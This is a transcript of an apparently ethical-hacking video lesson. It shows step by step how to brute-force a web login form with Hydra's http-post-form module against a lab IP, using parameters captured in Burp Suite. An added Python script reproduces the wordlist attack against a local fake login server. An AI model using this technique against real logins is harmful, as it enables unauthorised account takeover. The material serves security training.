[00:00:01] Now that we have a wordlist ready, whether you downloaded it from the internet or created it yourself, we can go ahead and try to gain access to our target website using a wordlist attack. We're going to use a tool called Hydra. Hydra can be used to brute-force pretty much any type of service; I can't think of a service that you can brute-force that it doesn't support, so it's a really handy tool to know how to use. We're going to do our example on a web login, but you can use it to gain access to SSH, FTP, routers, anything that asks you for a username and password. So, to use the tool, the first thing we're going to do is type hydra -h to see how to use it. As you can see there are a lot of options for the tool, but don't be overwhelmed by that; they're all pretty simple to use. If you scroll up you can see the main syntax: the first thing you put is the name of the tool, hydra, and then you put the target and the service that you want to attack. You can see that they have examples here of attacking an FTP service, an IMAP service and other types of services.
[00:01:28] In our example we're interested in gaining access to this login page here, and we're going to assume that we don't know the password and try to log in as admin without knowing it. So our target is this service. The first thing you need is its IP, and the IP is 10.20.11.46, so we're going to put it after the name of the tool. Then, looking at the syntax, you can see that we have to specify a login and a password, so let's have a look at the -l and -p options here. You can use a small -l to specify one username, or a capital -L to specify a list of usernames. In our example we're only trying to gain access to the admin account, so we're not going to use a list of usernames; we'll use -l and tell it that the username is admin. The next thing we need to specify is the password or a password list. Similarly, you can use a small -p to give one password, or a capital -P to specify a file: a wordlist or dictionary of passwords. I'm actually going to modify the passwords file that we created in the previous video, so I'm just going to open it in my text editor.
[00:03:18] This one right here is called test.txt, and I'm just going to add the admin's password to it. I know the password for the admin is adminpass, and I'll add it somewhere in the middle here. OK, I'll save and quit, and now our wordlist contains the password. So we're going to use -P (capital P) and give it the path where the wordlist is stored, which is /root/test.txt. Everything is good so far and there's only one more thing to do: we still haven't specified what type of service we're attacking. We gave it the IP, the username and the list of passwords to try, but Hydra still doesn't know what type of service we're going to attack. That is the most important option, and the one you need to pay the most attention to, because this is where it gets a bit tricky and where things can go wrong. Before I start talking about that, I'm going to copy our command so far and paste it in a notepad. All we have to do now is tell Hydra what type of service it is and how to use that service to brute-force the username and password. You can see here in the help
[00:04:47] that it's telling us that these are all the supported services. As I said, I can't actually think of a service that's not supported, so you can have a look at all of these and try them. What we're interested in is HTTP, and you can see that it's followed by a dash and then either get or post, depending on our target, and after that -form, because the login is sent through an HTML form. I'll show you why it's going to be like this. Let's go down: I'm going to right-click here, go to Inspect Element, and look for something called form. You can see that there is a form (there has to be a form on an HTML login page), and I'm going to look for its method. I'll zoom in for you. Note that it says the method is post, so that's how we know it's a POST. If you look at the URL here, you'll see that it's http, not https. Therefore the module, or service, that we're going to use is http-post-form. It's right here in the list of services like I said: http, followed by a dash, followed by post, followed by a dash and form.
[00:06:19] To see an example of how you can use this service, I'm going to Ctrl-C out of this and run hydra -U followed by the name of the service I want to use, which is http-post-form. As you can see, it gives you a long description of how to use the service, and at the bottom it gives examples. The examples are really good because you can just copy and paste them and adapt them to your target. The format of this service is: you give it the location of the page that you want to brute-force the form from, then the user parameter (whatever the username parameter is called), then the password parameter, and then the failure message, i.e. what happens on the web page when there's a failed login. I'm going to copy this the way it is and modify it to adapt it to our target. The first thing we want to put in is the page where the login happens, which is this page, so we're going to put its path instead of login.php here. That's all good. Now the next thing we need to modify is user and pass.
[00:08:00] These are the names of the parameters that are sent to the web application, and we don't know what they're called. For this we're going to use Burp Suite. I'm not going to show you how to configure it because we've done that before; I'm just going to turn my interceptor on and log in with a wrong username and password, because I just want to see what gets sent to the target web application. I'll log in with the username admin and just any random characters as the password, hit Enter, and look at the request. This is what's being sent: you can see that the username parameter is just called username, so I'm going to copy that and put it here instead of user. We can also see the password parameter; it's called password, so that goes in instead of pass (the ^USER^ and ^PASS^ placeholders stay where they are, since that's where Hydra substitutes each attempt). You can also see that there is another parameter here, the submit button, Login=Login, so you need to add that as well; in your case, if other things are being sent, you need to add them to your request too. We're going to add it after the pass part exactly the way it is, without modifying anything, so it's going to be &Login=Login.
[00:09:26] The last thing that we need to modify is this part, which is how Hydra is going to know whether the login is successful or unsuccessful. The way this works is you either give it a capital F= followed by what happens on a failed attempt, or a capital S= followed by what happens on a successful login. In my case I'm going to use capital F to tell it what happens when a login fails. I'll turn off the interceptor now, and we can see that we have failed again. You can either use this text, or, in my experimentation, it was easier to just use the message right here that says "Not logged in". So we're going to say F=Not logged in. Pick a string that appears only on failed attempts: if it also shows up after a successful login, Hydra will treat every attempt as a failure and never report the password. This is the most important and the trickiest part of the whole attack, so I'm going to go over it again. You can see that the whole request is separated by colons into three parts. The first part is the location of the page that we're going to brute-force; we took that from here. The second part is the parameters that are going to be sent to the server; we took those from Burp Suite. The third part is how Hydra is going to know whether the login is successful or unsuccessful.
[00:11:16] We gave it capital F to tell it that this is what happens when the password is wrong, and we told it that you'll see a message saying "Not logged in". We're going to combine this with the command that we already had, which was hydra, the IP, followed by the username we're going to use, admin, followed by the password list, and we're going to put all of this after it. That's it, that's our command done. I'm going to copy this, paste it in here and execute... and I forgot to tell it the type of service that we're going to be attacking. I only gave it what it should send, but I didn't tell it what type of service we're going to attack. Like I said before, it's going to be http-post-form, the same service that we were inquiring about when we used the -U option. So again, copy this, paste it here and hit Enter. You can use the -V option so that Hydra displays every request it sends to the server; I didn't use it right now, so all this is literally just a blank screen, but we're going to wait until it finds the password for us. Hydra also supports pause and resume.
[00:12:45] If you just Ctrl-C out of this, the next time you run it all you have to do is add -R, and that will let you continue from where you left off the last time. As you can see now, we managed to find a valid username and password: the username is admin and the password is adminpass. This works against any web login; this web login doesn't need to have any SQL injection or XSS vulnerabilities or anything like that. Now I can log in with the username admin and password adminpass, and as you can see, I'm logged in as admin.
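The following Python script is an added example, not part of the video and not Hydra's own code. It reproduces what the http-post-form module does with the three-part spec built in the video (path, form body with ^USER^/^PASS^ placeholders, F= or S= condition), and runs it against a constructed local login page that stands in for the target. The username, the password "adminpass", the wordlist, the Login=Login submit parameter and the "Not logged in" failure text are all assumed for the demo. Besides the working F= and S= runs, it shows the two ways the attack silently fails: a failure string that also appears on the success page, and a form body that leaves out a required parameter.

```python
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the target login page (assumed values, not a real host).
VALID_USER = "admin"
VALID_PASS = "adminpass"
FAIL_MSG = "Not logged in"


class LoginHandler(BaseHTTPRequestHandler):
    """Accepts one credential pair and only when the submit parameter is present."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = fields.get("username", [""])[0]
        password = fields.get("password", [""])[0]
        submitted = fields.get("Login", [""])[0]
        if user == VALID_USER and password == VALID_PASS and submitted == "Login":
            body = "<p>Welcome back. <a href='logout.php'>Logout</a></p>"
        else:
            body = f"<p>{FAIL_MSG}</p>"
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_server():
    """Bind the fake target to an ephemeral loopback port and serve in the background."""
    srv = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def post_form(url, template, user, password):
    """Fill the ^USER^/^PASS^ placeholders, POST the body, return the response HTML."""
    body = (template.replace("^USER^", urllib.parse.quote(user))
                    .replace("^PASS^", urllib.parse.quote(password)))
    req = urllib.request.Request(
        url, data=body.encode(), method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read().decode()


def brute_force(base_url, form_spec, user, wordlist):
    """Emulate the http-post-form spec "path:body:F=<fail text>" or "path:body:S=<success text>".

    F= means "a hit is a page that does NOT contain the text"; S= means "a hit is a
    page that DOES contain it". Returns the first password that hits, else None.
    """
    path, template, cond = form_spec.split(":", 2)
    if len(cond) < 2 or cond[0] not in ("F", "S") or cond[1] != "=":
        raise ValueError("condition must be F=<fail text> or S=<success text>")
    mode, needle = cond[0], cond[2:]
    for candidate in wordlist:
        page = post_form(base_url + path, template, user, candidate)
        hit = (needle not in page) if mode == "F" else (needle in page)
        if hit:
            return candidate
    return None


def demo():
    """Run the four variants against the fake target and return what each finds."""
    srv = start_server()
    base = f"http://127.0.0.1:{srv.server_address[1]}"
    wordlist = ["123456", "password", "adminpass", "letmein"]  # constructed
    body = "username=^USER^&password=^PASS^&Login=Login"
    results = {
        # failure-string match, as built in the video
        "F_mode": brute_force(base, f"/login.php:{body}:F={FAIL_MSG}", "admin", wordlist),
        # success-string match on text only the logged-in page has
        "S_mode": brute_force(base, f"/login.php:{body}:S=Logout", "admin", wordlist),
        # "<p>" is on the success page too, so every attempt looks like a failure
        "bad_fail_string": brute_force(base, f"/login.php:{body}:F=<p>", "admin", wordlist),
        # dropping &Login=Login means the server never accepts the login at all
        "missing_submit_param": brute_force(
            base, f"/login.php:username=^USER^&password=^PASS^:F={FAIL_MSG}", "admin", wordlist),
    }
    srv.shutdown()
    srv.server_close()
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The two None results are the practical lesson from the transcript: Hydra reports nothing (rather than an error) when the F= string is not specific to failed logins or when a parameter Burp showed being sent is left out of the body, so check both against a known-good credential before trusting an empty run.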